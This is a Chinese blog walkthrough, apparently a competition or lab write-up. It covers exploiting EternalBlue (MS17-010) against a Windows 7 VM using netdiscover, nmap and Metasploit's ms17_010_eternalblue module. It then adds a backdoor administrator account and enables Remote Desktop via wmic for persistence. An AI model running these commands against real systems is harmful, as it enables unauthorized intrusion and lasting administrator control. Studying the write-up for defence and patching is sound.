永恒之蓝漏洞(445端口)详细利用过程


永恒之蓝(445端口)完整利用过程

     前几天有一次比赛的时候接触到了永恒之蓝漏洞,之前也没复现过永恒之蓝漏洞,在查资料方面花费了很多时间,就想着写篇博客记录一下。

前置环境:

​ kali,win7虚拟机,msf(kali自带)

一 · 扫描网络中存活主机

使用命令:

netdiscover -i eth0 -r 192.168.1.1/24

PS:由于这里使用的是虚拟机,所以网卡显示为 VMware

二 · 扫描当前主机存活端口

使用命令:

nmap -sV -n 192.168.1.1

三 · 开启MSF并利用搜索并检测是否能利用永恒之蓝

开启MSF:

msfconsole

检测永恒之蓝是否能利用 :

search ms17-010

use auxiliary/scanner/smb/smb_ms17_010

set RHOST 192.168.1.2

经过检测可以发现永恒之蓝漏洞可以利用

四 · 利用永恒之蓝漏洞

use exploit/windows/smb/ms17_010_eternalblue

剩下的命令不再做文本解释

成功获得shell

=================================================================

so,获得shell之后应该做什么呢???

新建一个用户,以便下次访问。并将该用户升为管理员权限,这样就可以拥有更大的权限了

新建用户并添加到管理员中

net user taotao 123 /add
net localgroup administrators taotao /add

查看是否成功操作

net user 查看本地用户列表
net localgroup administrators

但是光有shell权限太不方便了,再开启一个3389方便远程连接

远程连接之前需要判断对方用户在不在线

开启远程桌面服务

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM